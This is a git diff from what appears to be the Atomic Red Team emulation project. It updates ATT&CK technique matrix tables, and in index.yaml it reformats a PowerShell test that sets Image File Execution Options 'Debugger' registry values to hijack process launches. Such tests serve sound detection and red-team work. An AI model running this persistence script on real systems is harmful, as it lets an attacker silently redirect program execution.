TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 5571924c..5c681900 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -1,7 +1,7 @@ # All Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | | Compromise Hardware Supply Chain 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global 
Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | 
@@ -9,7 +9,7 @@ | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access 
Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
@@ -38,7 +38,7 @@ | | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | | | | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security 
Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index bdfc59d5..0c3905e9 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -8,7 +8,7 @@ | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web 
Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
@@ -29,7 +29,7 @@ | | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | -| | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE 
A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | 
Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8283e50f..a13e2434 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -337,14 +337,23 @@ privilege-escalation: type: Path default: C:\windows\system32\cmd.exe executor: - command: "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value - = \"#{attached_process}\"\nForeach ($item in $input_table){ \n $item - = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows - NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path - $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty - -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n - \ }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value - $Value\n }\n}\n" + command: | + $input_table = "#{parent_list}".split(",") + $Name = "Debugger" + $Value = "#{attached_process}" + Foreach ($item in $input_table){ + $item = $item.trim() + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } cleanup_command: | $input_table = "#{parent_list}".split(",") Foreach ($item in $input_table) 
